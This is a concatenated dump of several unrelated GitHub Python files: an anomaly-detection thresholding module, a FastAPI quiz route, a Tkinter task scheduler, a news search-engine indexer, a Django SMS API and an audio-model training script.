  del E_seq[idx]\n\n    i_pruned = []\n    for i in i_anom:\n        keep_anomaly_idx = False\n\n        for e_seq in E_seq:\n            if i >= e_seq[0] and i <= e_seq[1]:\n                keep_anomaly_idx = True\n\n        if keep_anomaly_idx:\n            i_pruned.append(i)\n\n    return i_pruned\n\n\ndef get_anomalies(e_s, y_test, z, window, i_anom_full, len_y_test, p=0.25):\n    '''Find anomalous sequences of smoothed error values that are above error threshold (epsilon). 
Both\n    smoothed errors and the inverse of the smoothed errors are evaluated - large dips in errors often\n    also indicate anomalies.\n\n    Args:\n        e_s (list): smoothed errors between y_test and y_hat values\n        y_test (np array): test targets corresponding to true telemetry values at each timestep for given window\n        z (float): number of standard deviations above mean corresponding to epsilon\n        window (int): number of error windows that have been evaluated\n        i_anom_full (list): list of all previously identified anomalies in test set\n        len_y_test (int): num total test values available in dataset\n\n    Returns:\n        i_anom (list): indices of errors that are part of anomalous sequences\n    '''\n\n    perc_high, perc_low = np.percentile(y_test, [95, 5])\n    inter_range = perc_high - perc_low\n\n    mean = np.mean(e_s)\n    std = np.std(e_s)\n    chan_std = np.std(y_test)\n\n    e_s_inv = [mean + (mean - e) for e in e_s]  # flip it around the mean\n    z_inv = find_epsilon(e_s_inv, error_buffer)\n\n    epsilon = mean + (float(z) * std)\n    epsilon_inv = mean + (float(z_inv) * std)\n\n    # find sequences of anomalies greater than epsilon\n    E_seq, i_anom, non_anom_max = compare_to_epsilon(e_s, epsilon, len_y_test,\n                                                     inter_range, chan_std, std, error_buffer, window,\n                                                     i_anom_full)\n\n    # find sequences of anomalies using inverted error values (lower than normal errors are also anomalous)\n    E_seq_inv, i_anom_inv, inv_non_anom_max = compare_to_epsilon(e_s_inv, epsilon_inv,\n                                                                 len_y_test, inter_range, chan_std, std,\n                                                                 error_buffer, window, i_anom_full)\n\n    if len(E_seq) > 0:\n        i_anom = prune_anoms(E_seq, e_s, non_anom_max, i_anom, p)\n\n    if len(E_seq_inv) > 0:\n        i_anom_inv = prune_anoms(E_seq_inv, e_s_inv, inv_non_anom_max, i_anom_inv, p)\n\n    i_anom = list(set(i_anom + i_anom_inv))\n\n    return i_anom\n\n\n# Not using because I don't have labeled anomalies\n# def evaluate_sequences(E_seq, anom):\n#     '''Compare identified anomalous sequences with labeled anomalous sequences\n#\n#     Args:\n#         E_seq (list of lists): contains start and end indices of anomalous ranges\n#         anom (dict): contains anomaly information for a given input stream\n#\n#     Returns:\n#         anom (dict): with updated anomaly information (whether identified, scores, etc.)\n#     '''\n#\n#     anom[\"false_positives\"] = 0\n#     anom[\"false_negatives\"] = 0\n#     anom[\"true_positives\"] = 0\n#     anom[\"fp_sequences\"] = []\n#     anom[\"tp_sequences\"] = []\n#     anom[\"num_anoms\"] = len(anom[\"anomaly_sequences\"])\n#\n#     E_seq_test = eval(anom[\"anomaly_sequences\"])\n#\n#     if len(E_seq) > 0:\n#\n#         matched_E_seq_test = []\n#\n#         for e_seq in E_seq:\n#\n#             valid = False\n#\n#             for i, a in enumerate(E_seq_test):\n#\n#                 if (e_seq[0] >= a[0] and e_seq[0] <= a[1]) or (e_seq[1] >= a[0] and e_seq[1] <= a[1]) or \\\n#                         (e_seq[0] <= a[0] and e_seq[1] >= a[1]) or (a[0] <= e_seq[0] and a[1] >= e_seq[1]):\n#\n#                     anom[\"tp_sequences\"].append(e_seq)\n#\n#                     valid = True\n#\n#                     if i not in matched_E_seq_test:\n#                         anom[\"true_positives\"] += 1\n#                         matched_E_seq_test.append(i)\n#\n#             if valid == False:\n#                 anom[\"false_positives\"] += 1\n#                 anom[\"fp_sequences\"].append([e_seq[0], e_seq[1]])\n#\n#         anom[\"false_negatives\"] += (len(E_seq_test) - len(matched_E_seq_test))\n#\n#     else:\n#         anom[\"false_negatives\"] += len(E_seq_test)\n#\n#     return anom\n\n#####################################\n# Function was created by CU Boulder student, Shawn Polson\n# Adjusted for this project by improving outputs and allowing better parameter choices (eliminating hardcoded variables)\n\ndef detect_anomalies(ts, normal_model, ds_name, var_name, alg_name, 
window_size=30, batch_size=70, smoothing_perc=0.05,\n                     p=0.25, outlier_def='dynamic', num_stds=2, ndt_errors=None,\n                     plot_save_path=None, data_save_path=None):\n    \"\"\"Detect outliers in the time series data by comparing points against a \"normal\" model.\n    Inputs:\n        ts [pd Series]: A pandas Series with a DatetimeIndex and a column for numerical values.\n        normal_model [pd Series]: A pandas Series with a DatetimeIndex and a column for numerical values.\n        ds_name [str]: The name of the time series dataset.\n        var_name [str]: The name of the dependent variable in the time series.\n        alg_name [str]: The name of the algorithm used to create 'normal_model'.\n    Optional Inputs:\n        outlier_def [str]: {'std', 'errors', 'dynamic'} The definition of an outlier to be used. Can be 'std' for [num_stds] from the data's mean,\n                           'errors' for [num_stds] from the mean of the errors, or 'dynamic' for nonparametric dynamic thresholding.\n                           Default is 'dynamic'.\n        num_stds [float]: The number of standard deviations away from the mean used to define point outliers (when applicable).\n                          Default is 2.\n        ndt_errors [list]: Optionally skip nonparametric dynamic thresholding's 'get_errors()' and use these values instead.\n        plot_save_path [str]: The file path (ending in file name *.png) for saving plots of outliers.\n        data_save_path [str]: The file path (ending in file name *.csv) for saving CSVs with outliers.\n    Outputs:\n        time_series_with_outliers [pd DataFrame]: A pandas DataFrame with a DatetimeIndex, two columns for numerical values, and an Outlier column (True or False).\n    Optional Outputs:\n        None\n    Example:\n        time_series_with_outliers = detect_anomalies(time_series, model, 'BatteryTemperature', 'Temperature (C)',\n                                                     'ARIMA', outlier_def='dynamic', plot_save_path=plot_path, data_save_path=data_path)\n    \"\"\"\n\n    X = ts.values\n    Y = normal_model.values\n    outliers = pd.Series()\n    errors = pd.Series()\n    time_series_with_outliers = pd.DataFrame({var_name: ts, alg_name: normal_model})\n    time_series_with_outliers['Outlier'] = 'False'\n    column_names = [var_name, alg_name, 'Outlier']  # column order\n    time_series_with_outliers = time_series_with_outliers.reindex(columns=column_names)  # sort columns in specified order\n\n    # Start a progress bar\n    widgets = [progressbar.Percentage(), progressbar.Bar(), progressbar.Timer(), ' ', progressbar.AdaptiveETA()]\n    progress_bar_sliding_window = progressbar.ProgressBar(\n        widgets=[progressbar.FormatLabel('Outliers (' + ds_name + ')')] + widgets,\n        maxval=int(len(X))).start()\n\n\n    # Define outliers using JPL's nonparametric dynamic thresholding technique\n    if outlier_def == 'dynamic':\n        progress_bar_sliding_window.update(int(len(X))/2)  # start progress bar timer\n        outlier_points = []\n        outlier_indices = []\n        if ndt_errors is not None:\n            smoothed_errors = ndt_errors\n        else:\n            # positional order matches get_errors(y_test, y_hat, batch_size, window_size, smoothing_perc)\n            smoothed_errors = get_errors(X, Y, batch_size, window_size, smoothing_perc)\n        time_series_with_outliers['errors'] = smoothed_errors\n\n        # These are the results of the nonparametric dynamic thresholding\n        E_seq, anom_scores = process_errors(X, smoothed_errors, window_size, batch_size, p)\n        progress_bar_sliding_window.update(int(len(X)) - 1)  # advance progress bar timer\n\n        # Convert sets of outlier start/end indices into outlier points\n        for anom in E_seq:\n            start = anom[0]\n            end = anom[1]\n            for i in range(start, end+1):\n                time_series_with_outliers.at[ts.index[i], 'Outlier'] = 'True'\n                outlier_points.append(X[i])\n                outlier_indices.append(ts.index[i])\n        outliers = outliers.append(pd.Series(outlier_points, index=outlier_indices))\n\n        # Plot anomalies\n        ax = 
ts.plot(color='#192C87', title=ds_name + ' with ' + alg_name + ' Outliers', label=var_name, figsize=(14, 6))\n normal_model.plot(color='#0CCADC', label=alg_name, linewidth=1.5)\n if len(outliers) > 0:\n print('Detected outliers (' + ds_name + '): ' + str(len(outliers)))\n outliers.plot(color='red', style='.', label='Outliers')\n ax.set(xlabel='Time', ylabel=var_name)\n pyplot.legend(loc='best')\n\n # Save plot\n if plot_save_path is not None:\n plot_dir = plot_save_path[:plot_save_path.rfind('/')+1]\n if not os.path.exists(plot_dir):\n os.makedirs(plot_dir)\n pyplot.savefig(plot_save_path, dpi=500)\n\n pyplot.show()\n pyplot.clf()\n\n # Save data\n if data_save_path is not None:\n data_dir = data_save_path[:data_save_path.rfind('/')+1]\n if not os.path.exists(data_dir):\n os.makedirs(data_dir)\n time_series_with_outliers.to_csv(data_save_path)\n\n return time_series_with_outliers\n","repo_name":"Isaacburmingham/multivariate-time-series-anomaly-detection","sub_path":"Algorithm Modeling Functions/nonparametric_dynamic_thresholding.py","file_name":"nonparametric_dynamic_thresholding.py","file_ext":"py","file_size_in_byte":22546,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"38"} +{"seq_id":"4681900095","text":"from typing import List\n\nfrom fastapi import APIRouter, Body, Depends, BackgroundTasks\nfrom pydantic import conint\nfrom sqlalchemy.orm import Session\n\nfrom src.question_service import question_service\nfrom .db.session import get_db\nfrom .schemas import Question\n\nrouter = APIRouter()\n\n\n@router.get('/', tags=['Root'])\nasync def root():\n return {'message': '200 OK'}\n\n\n@router.post(\n '/',\n tags=['Question'],\n response_model=List[Question],\n summary=\"Get quiz questions\"\n)\ndef get_question(\n *, db: Session = Depends(get_db),\n questions_num: conint(gt=0) = Body(1, embed=True),\n background_tasks: BackgroundTasks\n):\n background_tasks.add_task(\n question_service.get_and_save_questions,\n db=db,\n count=questions_num\n )\n\n return question_service.find(\n db=db,\n limit=questions_num\n )\n","repo_name":"MRainbowM/test_bewise","sub_path":"src/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"5102965794","text":"# imports\n\nimport tkinter as tk\nimport subprocess\nimport schedule\nimport time\nimport threading\nimport datetime\n\n\nclass GUI:\n def __init__(self):\n self.root = tk.Tk()\n self.root.title(\"DomoLazeriai scrap APP. 
By IamGuber.\")\n \n # info log\n\n self.log = tk.Text(self.root, height=10, width=50)\n self.log.pack()\n \n # push button\n\n self.button = tk.Button(self.root, text=\"Start scrap\", command=self.start_function)\n self.button.pack()\n\n # push button2\n\n self.button = tk.Button(self.root, text=\"Start email\", command=self.start_function2)\n self.button.pack()\n \n # schedule the Start button to be clicked every day by clock\n\n schedule.every().day.at(\"06:00\").do(self.start_function)\n\n # schedule the Start button2 to be clicked every day by clock\n\n schedule.every().day.at(\"09:00\").do(self.start_function2)\n\n\n def start_function2(self):\n self.log.insert(tk.END, \"\\nStarting email sending...\\n\")\n\n # start email file sending\n\n try:\n subprocess.Popen([\"python\", \"/Users/voisk/Desktop/SCRAPING APP/mail_sending.py\"])\n self.log.insert(tk.END, \"Email send successfully.\\n\" f\"{datetime.datetime.now()}\")\n except Exception as e:\n self.log.insert(tk.END, f\"Error sending email file: {str(e)}\\n\")\n \n\n def start_function(self):\n self.log.insert(tk.END, \"\\nStarting scrap function...\\n\")\n\n # start scrap file \n\n try:\n subprocess.Popen([\"python\", \"/Users/voisk/Desktop/SCRAPING APP/scrap.py\"])\n self.log.insert(tk.END, \"Scrap file started successfully.\\n\" f\"{datetime.datetime.now()}\")\n except Exception as e:\n self.log.insert(tk.END, f\"Error starting scrap file: {str(e)}\\n\")\n\n\n def run(self):\n\n # start the scheduler in a new thread\n\n schedule_thread = threading.Thread(target=self.schedule_loop, daemon=True)\n schedule_thread.start()\n \n # start the GUI\n\n self.root.mainloop()\n \n\n def schedule_loop(self):\n\n # run the scheduler loop in the background\n\n while True:\n schedule.run_pending()\n time.sleep(1)\n\n\n# create and run the GUI\n\ngui = GUI()\ngui.run()","repo_name":"IamGuber/Scrap-APP","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"24825096294","text":"import json\r\n\r\nimport pandas\r\nfrom pre_processor import DocTokenizer\r\nfrom dictionary import Dictionary\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nimport pickle\r\nimport glob\r\nimport os\r\nfrom mongoengine import connect\r\nfrom model.news import NewsModel\r\n\r\ndoc_tokenizer = DocTokenizer()\r\ndata_set = '../IR-project-data-phase-3-100k'\r\n\r\nconnect('IREngine', host=\"mongodb://localhost:27017\")\r\n\r\n\r\n# def doc2file(doc_id):\r\ndef to_db():\r\n idx = 0\r\n for filename in glob.glob(os.path.join(data_set, '*.csv')):\r\n df = pandas.read_csv(filename, encoding='utf_8')\r\n\r\n for inn in range(df.shape[0]):\r\n\r\n idx += 1\r\n print('saving' + str(idx))\r\n doc = df.loc[inn, :]\r\n content = doc_tokenizer.clean_html(doc['content'])\r\n publish_date = doc['publish_date']\r\n title = doc['title']\r\n url = doc['url']\r\n summary = doc['summary']\r\n if type(summary) is float:\r\n summary = ' '\r\n meta_tags = json.loads(doc['meta_tags'])\r\n thumbnail = doc['thumbnail']\r\n if type(thumbnail) is float:\r\n thumbnail = 'https://www.bvfd.com/wp-content/uploads/2015/12/placeholder.jpg'\r\n if type(title) is float:\r\n title = \"خبر\"\r\n news = NewsModel()\r\n news.meta_tags = meta_tags\r\n news.thumbnail = thumbnail\r\n news.url = url\r\n news.content = content\r\n news.publish_date = publish_date\r\n news.summary = summary\r\n news.title = title\r\n news.news_id = idx - 1\r\n 
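# (Editorial note, added; hypothetical optimization, not part of the original code) news.save() below issues one MongoDB round trip per record; for the 100k-document corpus, mongoengine's bulk API, e.g. NewsModel.objects.insert(list_of_unsaved_docs), would batch these writes.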
news.save()\r\n\r\n\r\ndef get_news_by_id(doc):\r\n    return NewsModel.objects(news_id=doc)\r\n\r\n\r\ndef indexing():\r\n    print(\"Creating index...\")\r\n    dictionary = Dictionary()\r\n    to_db()\r\n    doc2term = dict()\r\n    docId = 0\r\n    for filename in glob.glob(os.path.join(data_set, '*.csv')):\r\n        print(\"Creating Index of \", filename)\r\n        df = pandas.read_csv(filename, encoding='utf_8')\r\n        for doc in df['content']:\r\n            # total_tokens = np.zeros(df.shape[0]) # Zipf's and Heaps' laws\r\n            # total_terms = np.zeros(df.shape[0]) # Zipf's and Heaps' laws\r\n            # doc2term_file = open('./doc2term.txt', 'w', encoding='utf_8')\r\n            print('Indexing doc ', docId)\r\n            positionals = doc_tokenizer.get_tokens(doc)\r\n\r\n            # if i != 0:\r\n            #     total_tokens[i] = total_tokens[i - 1] # Zipf's and Heaps' laws\r\n            terms = []\r\n            # doc2term_file.write(str(i) + ' => ')\r\n            doc2term[docId] = list()\r\n\r\n            for positional in positionals:\r\n                # dictionary.add_term_to_dictionary(positional, i)\r\n                # total_tokens[i] = total_tokens[i] + len(positional[1]) # Zipf's and Heaps' laws\r\n                # terms.append((positional[0], len(positional[1]))) # Zipf's and Heaps' laws\r\n                # doc2term_file.write(str(positional[0]) + ':' + str(len(positional[1])) + ',')\r\n                doc2term[docId].append((str(positional[0]), len(positional[1])))\r\n                if dictionary.existed_in_dictionary(positional[0]):\r\n                    dictionary.add_term_to_dictionary(positional, docId)\r\n                    # temp = dictionary.terms_cf[positional[0]] # Zipf's and Heaps' laws\r\n                else:\r\n                    new_posting = list()\r\n                    new_posting.append((docId, positional[1]))\r\n                    dictionary.dictionary[positional[0]] = (1, new_posting)\r\n                    # temp = 0 # Zipf's and Heaps' laws\r\n            docId += 1\r\n            print(\"Done\")\r\n            # dictionary.terms_cf[positional[0]] = len(positional[1]) + temp # Zipf's and Heaps' laws\r\n            # doc2term_file.write('\\n')\r\n\r\n            # total_terms[i] = len(dictionary.dictionary.keys())\r\n\r\n    # heaps_law(total_tokens, total_terms)\r\n    # zipfs_law(dictionary.terms_cf)\r\n    # dict = dictionary.get_dictionary()\r\n    # print(dictionary.get_dictionary()['ایران'])\r\n\r\n    with open('inverted_index_500.pickle', 'wb') as handle:\r\n        pickle.dump(dictionary.get_dictionary(), handle, protocol=pickle.HIGHEST_PROTOCOL)\r\n\r\n    with open('doc2term_index_500.pickle', 'wb') as handle:\r\n        pickle.dump(doc2term, handle, protocol=pickle.HIGHEST_PROTOCOL)\r\n\r\n    # with open('./index.txt', 'w', encoding=\"utf_8\") as f:\r\n    #     for key in sorted(dict.keys()):\r\n    #         f.writelines([key, \" => \", str(dict[key]), \"\\n\"])\r\n    print(\"Done!\")\r\n\r\n\r\ndef fetch_result(doc_list):\r\n    # df = pandas.read_csv(data_set)\r\n    result = []\r\n    for doc_id in doc_list:\r\n        # content = df['content'][doc_id]\r\n        # content = doc_tokenizer.clean_html(content)\r\n        # content = doc_tokenizer.text_normalizer(content)\r\n        #\r\n        # publish_date = df['publish_date'][doc_id]\r\n        # title = df['title'][doc_id]\r\n        # url = df['url'][doc_id]\r\n        # summary = df['summary'][doc_id]\r\n        # if type(summary) is float:\r\n        #     summary = ' '\r\n        # meta_tags = df['meta_tags'][doc_id]\r\n        # thumbnail = df['thumbnail'][doc_id]\r\n        # if type(thumbnail) is float:\r\n        #     thumbnail = 'https://www.bvfd.com/wp-content/uploads/2015/12/placeholder.jpg'\r\n        # result.append(news)\r\n        q = get_news_by_id(doc_id)\r\n        print(q)\r\n        if len(q) > 0:\r\n            nw = q[0]\r\n            news = {'content': str(nw.content), 'publish_date': str(nw.publish_date), 'title': str(nw.title), 'url': str(nw.url),\r\n                    'summary': str(nw.summary),\r\n                    'meta_tags': nw.meta_tags, 'thumbnail': str(nw.thumbnail)}\r\n            result.append(news)\r\n        else:\r\n            return []\r\n    
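# (Editorial comment, added) fetch_result is all-or-nothing: the first missing id returns [] above instead of partial results, so callers must treat an empty list as a failed lookup; otherwise the full result list is returned below.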
return result\r\n\r\n\r\ndef heaps_law(total_tokens, total_terms):\r\n total_tokens = np.log10(total_tokens)\r\n total_terms = np.log10(total_terms)\r\n x = np.linspace(0, total_tokens[len(total_tokens) - 1], 2000)\r\n y = math.log(40, 10) + (1 / 2) * x\r\n plt.plot(total_tokens, total_terms)\r\n plt.plot(x, y, '--')\r\n plt.xlabel('log10 T')\r\n plt.ylabel('log10 M')\r\n plt.title('Heap`s law')\r\n plt.savefig('./plots/heaps.png')\r\n plt.show()\r\n\r\n\r\ndef zipfs_law(terms_cf):\r\n sorted_terms_cf = [(k, terms_cf[k]) for k in sorted(terms_cf, key=terms_cf.get, reverse=True)]\r\n total_cf = []\r\n for k, v in sorted_terms_cf:\r\n total_cf.append(v)\r\n total_cf = np.array(total_cf)\r\n total_cf = np.log10(total_cf)\r\n print(total_cf)\r\n total_ranks = np.arange(len(total_cf))\r\n total_ranks = total_ranks + 1\r\n total_ranks = np.log10(total_ranks)\r\n print(total_ranks)\r\n x = np.linspace(0, total_ranks[len(total_ranks) - 1], 2000)\r\n y = math.log(10000, 10) - x\r\n plt.plot(total_ranks, total_cf)\r\n plt.plot(x, y, '--')\r\n plt.xlabel('log10 rank')\r\n plt.ylabel('log10 cf')\r\n plt.title('Zipf`s law')\r\n plt.savefig('./plots/zipfs.png')\r\n plt.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n # indexing()\r\n # caltest()\r\n to_db()\r\n a = get_news_by_id([10304, 12])\r\n print(get_news_by_id([10304, 12]))\r\n # print(fetch_result([108]))\r\n # doclist = [15]\r\n # result = fetch_result(doclist)\r\n # print(result)\r\n # for r in result:\r\n # print(r['summary'])\r\n","repo_name":"parsareal/News-Search-Engine","sub_path":"TextMinning-master/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":7301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"70843477551","text":"import uuid\nimport phonenumbers\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.generics import get_object_or_404\n\nfrom sms_counter import SMSCounter\n\nfrom .models import SMSMessage, InvalidSMSMessage, SMSMessageStateLog\n\n\nclass VTigerPluginAPI(APIView):\n \"\"\" API to Send SMS \"\"\"\n parser_classes = (JSONParser,)\n permission_classes = (IsAuthenticated,)\n \n def post(self, request, format=None):\n data = request.data\n recipients = data.get(\"to\")\n sms_message = data.get(\"message\")\n \n if not recipients or len(recipients) == 0:\n return Response(\"Recipient(s) missing\", status=status.HTTP_400_BAD_REQUEST)\n \n if not sms_message:\n return Response(\"Message missing\", status=status.HTTP_400_BAD_REQUEST)\n \n result = {\n \"messages\": [],\n \"invalid_numbers\": []\n }\n \n # set bulkId\n bulk_id = None\n if len(recipients) > 1:\n bulk_id = data.get(\"bulkId\", uuid.uuid4())\n result[\"bulkId\"] = bulk_id \n \n counter = SMSCounter.count(data.get(\"message\"))\n \n for recipient in recipients:\n try:\n # this will raise an exception early if number is invalid\n phonenumbers.parse(recipient, None)\n \n m = SMSMessage.objects.create(\n id = data.get(\"messageId\", uuid.uuid4()),\n bulk_id = bulk_id,\n text = data.get(\"message\"),\n recipient = recipient,\n owner = request.user,\n pages = counter[\"messages\"]\n )\n \n result[\"messages\"].append(\n {\n \"to\": str(m.recipient),\n \"submitted\": True,\n \"messageId\": m.id,\n \"smsCount\": m.pages\n }\n ) \n except phonenumbers.phonenumberutil.NumberParseException:\n 
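# (Editorial comment, added) phonenumbers.parse() raised, so this recipient is malformed. Note: a ValueError raised inside this handler would not be caught by the sibling except-clause below (sibling handlers only catch exceptions from the try body), so the invalid number is recorded here and the loop simply moves on to the next recipient.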
result[\"invalid_numbers\"].append(recipient)\n                InvalidSMSMessage.objects.create(\n                    text = data.get(\"message\"),\n                    recipient = recipient,\n                    user = request.user,\n                    error_reason = 'Invalid recipient number: {}'.format(recipient)\n                )\n            except ValueError as ve:\n                InvalidSMSMessage.objects.create(\n                    text = data.get(\"message\"),\n                    recipient = recipient,\n                    user = request.user,\n                    message = m,\n                    error_reason = ve\n                )\n        return Response(result, status=status.HTTP_201_CREATED)\n    \nclass SMSReport(APIView):\n    \n    permission_classes = (IsAuthenticated,)\n    \n    def get(self, request, messageid, format=None):\n        # SMSMessage stores the creator in 'owner' (see create() above)\n        m = get_object_or_404(SMSMessage, id=messageid, owner=request.user)\n        \n        result = {}\n        # successfully sent\n        latest_state = m.status\n        if latest_state == SMSMessage.Status.SUCCESS:\n            result['sent'] = True\n            result['to'] = str(m.recipient)\n            result['time'] = latest_state.timestamp\n        elif latest_state == SMSMessage.Status.ERROR:\n            result['error'] = True\n            result['errorReason'] = latest_state.state_reason\n        elif latest_state == SMSMessage.Status.FAILED:\n            result['failed'] = True\n        \n        return Response(result)","repo_name":"dedayoa/yeastar-sms-bridge","sub_path":"sms/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"33956801631","text":"\nimport os\nimport glob\nimport torch\nimport torchsummary\nfrom itertools import product\nimport pytorch_lightning as pl\nfrom argparse import ArgumentParser\n\nfrom microtcn.tcn import TCNModel\nfrom microtcn.lstm import LSTMModel\nfrom microtcn.data import SignalTrainLA2ADataset\n\ntorch.backends.cudnn.benchmark = True\n\ntrain_configs = [\n    {\"name\" : \"uTCN-300\",\n     \"model_type\" : \"tcn\",\n     \"nblocks\" : 4,\n     \"dilation_growth\" : 10,\n     \"kernel_size\" : 13,\n     \"causal\" : True,\n     \"train_fraction\" : 0.01,\n     \"batch_size\" : 32\n    },\n    {\"name\" : \"uTCN-100\",\n     \"model_type\" : \"tcn\",\n     \"nblocks\" : 4,\n     \"dilation_growth\" : 10,\n     \"kernel_size\" : 5,\n     \"causal\" : True,\n     \"train_fraction\" : 1.00,\n     \"batch_size\" : 32\n    },\n    {\"name\" : \"uTCN-300\",\n     \"model_type\" : \"tcn\",\n     \"nblocks\" : 4,\n     \"dilation_growth\" : 10,\n     \"kernel_size\" : 13,\n     \"causal\" : True,\n     \"train_fraction\" : 1.00,\n     \"batch_size\" : 32\n    },\n    {\"name\" : \"uTCN-1000\",\n     \"model_type\" : \"tcn\",\n     \"nblocks\" : 5,\n     \"dilation_growth\" : 10,\n     \"kernel_size\" : 5,\n     \"causal\" : True,\n     \"train_fraction\" : 1.00,\n     \"batch_size\" : 32\n    },\n    {\"name\" : \"uTCN-100\",\n     \"model_type\" : \"tcn\",\n     \"nblocks\" : 4,\n     \"dilation_growth\" : 10,\n     \"kernel_size\" : 5,\n     \"causal\" : False,\n     \"train_fraction\" : 1.00,\n     \"batch_size\" : 32\n    },\n    {\"name\" : \"uTCN-300\",\n     \"model_type\" : \"tcn\",\n     \"nblocks\" : 4,\n     \"dilation_growth\" : 10,\n     \"kernel_size\" : 13,\n     \"causal\" : False,\n     \"train_fraction\" : 1.00,\n     \"batch_size\" : 32\n    },\n    {\"name\" : \"uTCN-1000\",\n     \"model_type\" : \"tcn\",\n     \"nblocks\" : 5,\n     \"dilation_growth\" : 10,\n     \"kernel_size\" : 5,\n     \"causal\" : False,\n     \"train_fraction\" : 1.00,\n     \"batch_size\" : 32\n    },\n    {\"name\" : \"TCN-300\",\n     \"model_type\" : \"tcn\",\n     \"nblocks\" : 10,\n     \"dilation_growth\" : 2,\n     \"kernel_size\" : 15,\n     \"causal\" : False,\n     \"train_fraction\" : 1.00,\n     \"batch_size\" : 32\n    },\n    {\"name\" : \"uTCN-300\",\n     \"model_type\" : \"tcn\",\n     \"nblocks\" : 4,\n     \"dilation_growth\" : 10,\n     \"kernel_size\" : 13,\n     \"causal\" : True,\n     \"train_fraction\" : 0.10,\n     \"batch_size\" : 32\n    },\n    {\"name\" : \"LSTM-32\",\n     \"model_type\" : \"lstm\",\n     \"num_layers\" : 1,\n     \"hidden_size\" : 32,\n     \"train_fraction\" : 
1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 3,\n \"dilation_growth\" : 60,\n \"kernel_size\" : 5,\n \"causal\" : True,\n \"train_fraction\" : 1.0,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 4,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 13,\n \"causal\" : True,\n \"train_fraction\" : 1.0,\n \"batch_size\" : 32,\n \"max_epochs\" : 60,\n \"train_loss\" : \"l1\"\n },\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 30,\n \"dilation_growth\" : 2,\n \"kernel_size\" : 15,\n \"causal\" : False,\n \"train_fraction\" : 1.0,\n \"batch_size\" : 32,\n \"max_epochs\" : 60,\n },\n {\"name\" : \"uTCN-324-16\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 10,\n \"dilation_growth\" : 2,\n \"kernel_size\" : 15,\n \"causal\" : False,\n \"train_fraction\" : 1.0,\n \"batch_size\" : 32,\n \"max_epochs\" : 60,\n \"channel_width\" : 16,\n },\n]\n\nn_configs = len(train_configs)\n\nfor idx, tconf in enumerate(train_configs):\n\n #if (idx+1) not in [14]: continue\n # if you only want to train a specific model\n\n parser = ArgumentParser()\n\n # add PROGRAM level args\n parser.add_argument('--model_type', type=str, default='tcn', help='tcn or lstm')\n parser.add_argument('--root_dir', type=str, default='./data')\n parser.add_argument('--preload', action=\"store_true\")\n parser.add_argument('--sample_rate', type=int, default=44100)\n parser.add_argument('--shuffle', type=bool, default=True)\n parser.add_argument('--train_subset', type=str, default='train')\n parser.add_argument('--val_subset', type=str, default='val')\n parser.add_argument('--train_length', type=int, default=65536)\n parser.add_argument('--train_fraction', type=float, default=1.0)\n parser.add_argument('--eval_length', type=int, default=131072)\n parser.add_argument('--batch_size', type=int, default=32)\n parser.add_argument('--num_workers', type=int, default=16)\n\n # add all the available trainer options to argparse\n parser = pl.Trainer.add_argparse_args(parser)\n\n # THIS LINE IS KEY TO PULL THE MODEL NAME\n temp_args, _ = parser.parse_known_args()\n\n print(f\"* Training config {idx+1}/{n_configs}\")\n print(tconf)\n \n # let the model add what it wants\n if temp_args.model_type == 'tcn':\n parser = TCNModel.add_model_specific_args(parser)\n elif temp_args.model_type == 'lstm':\n parser = LSTMModel.add_model_specific_args(parser)\n\n # parse them args\n args = parser.parse_args()\n\n # set the seed\n pl.seed_everything(42)\n\n # only run 60 epochs\n args.max_epochs = 60\n\n # init the trainer and model \n if tconf[\"model_type\"] == 'tcn':\n specifier = f\"{idx+1}-{tconf['name']}\"\n specifier += \"__causal\" if tconf['causal'] else \"__noncausal\"\n specifier += f\"__{tconf['nblocks']}-{tconf['dilation_growth']}-{tconf['kernel_size']}\"\n specifier += f\"__fraction-{tconf['train_fraction']}-bs{tconf['batch_size']}\"\n elif tconf[\"model_type\"] == 'lstm':\n specifier = f\"{idx+1}-{tconf['name']}\"\n specifier += f\"__{tconf['num_layers']}-{tconf['hidden_size']}\"\n specifier += f\"__fraction-{tconf['train_fraction']}-bs{tconf['batch_size']}\"\n\n if \"max_epochs\" in tconf:\n args.max_epochs = tconf[\"max_epochs\"]\n else:\n args.max_epochs = 60\n\n if \"train_loss\" in tconf:\n args.train_loss = tconf[\"train_loss\"]\n specifier += f\"__loss-{tconf['train_loss']}\"\n\n args.precision = 16\n\n args.default_root_dir = os.path.join(\"lightning_logs\", \"bulk\", specifier)\n print(args.default_root_dir)\n 
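# (Editorial note, added; assumption based on the APIs used, not stated in the original) pl.seed_everything, pl.Trainer.add_argparse_args and pl.Trainer.from_argparse_args follow the PyTorch Lightning 1.x API; the argparse helpers were removed in Lightning 2.x, so running this script unmodified likely requires pinning pytorch-lightning<2.0.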
